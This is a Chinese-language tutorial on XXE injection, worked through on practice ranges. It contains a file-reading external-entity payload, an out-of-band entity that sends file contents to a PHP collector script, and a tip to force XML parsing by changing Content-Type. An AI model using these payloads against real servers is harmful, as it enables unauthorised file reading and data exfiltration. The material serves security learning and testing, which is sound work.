XXE和XML概念
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
XML数据传输数据包分析
xml是文件传输的一种格式,就像字符串一样,xml对应的数据格式
我们使用xxe-labs靶场进行抓包可以获取xml格式的数据报文
在数据报中的头部信息中accept字段和Content-Type字段中具有xml字段,且数据内容中都有<></>的字样
在数据报中我们可以通过其特征来判断是xml传输数据
源码查看
服务器的数据解析形式决定了数据的传输格式
我们可以查看源代码可以看见,源代码中有处理xml数据的特定代码
利用XXE漏洞进行系统网站的文件读取
有数据回显
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "file:///D:/5.txt" >
]>
直接执行xml读取文件内容
成功读取到了主机里面的文件
这种情况适用于有页面回显的情况,我们直接读取系统文件可以获取其中的内容
无数据回显
带外测试:确定目标可以向外发送数据--->目的:解决数据的无回显问题
请求DNSlog地址的数据报
查看DNSlog的数据回显
引用外部实体--dtd
目的:1.解决拦截防护问题
2.解决数据不回显问题
我们先使用xml语句获取我们想要的文件信息,并且将其中的信息存入指定的变量
<!ENTITY %all "<!ENTITY sent SYSTEM 'http://127.0.0.1/get.php?file=%file;'>">
我们获取到信息后然后去请求我们构造好的get.php代码就会将文件信息写到我们的网站目录下
<?php
$data = $_GET['file'];
$myfile=fopen("file.txt","w+");
fwrite($myfile,$data);
fclose($myfile);
最后查看get.php就可以获取到无法回显的内容
案例分析
这是一个在线等靶场环境
题目给我们一个输入框,我们查看源代码可以看到,前端代码中有一个函数是调用了xml进行数据传输
为此,我们可以抓包修改其数据包进行xml注入
但是 我们捕获到的数据是json数据
为此我们可以修改content-type的类型,使网站接收xml数据,我们写入都去文件信息的语句发现文章回显了内容,证明xml语句执行成功
为此我们可以得出结论,在网站的数据接收接口,不管数据包中的数据类型是什么,我们都可以修改Content-Type为xml进行测试
XXE漏洞测试思路
黑盒
抓获数据包,数据包中的数据类型Content-Type为xml的时候 ,可以尝试xml的payload测试
不管数据包中的数据类型是什么,我们都可以修改Content-Type为xml进行测试
功能分析-->前端提交-->抓包分析-->构造payload
白盒
通过功能定位追踪代码定位审计
通过脚本固定特定的函数搜索定位审计
通过伪协议绕过相关防护
PHP举例
SimpleXML是PHP5后提供的一套简单易用的xml工具集,可以把xml转换成方便处理的对象,也可以组织生成xml数据。不过它不适用于包含namespace的xml,而且要保证xml格式完整(well-formed)。它提供了三个方法:simplexml_import_dom、simplexml_load_file、simplexml_load_string,函数名很直观地说明了函数的作用。三个函数都返回SimpleXMLElement对象,数据的读取/添加都是通过SimpleXMLElement操作。
我们就可以去定位这些函数去判断里面的代码是否存在XXE注入漏洞
漏洞修复
禁用关键字如: <!DOCTYPE<!ENTITY SYSTEM PUBLIC
禁用实体类引用
写在最后
如有错误,请及时指出,感谢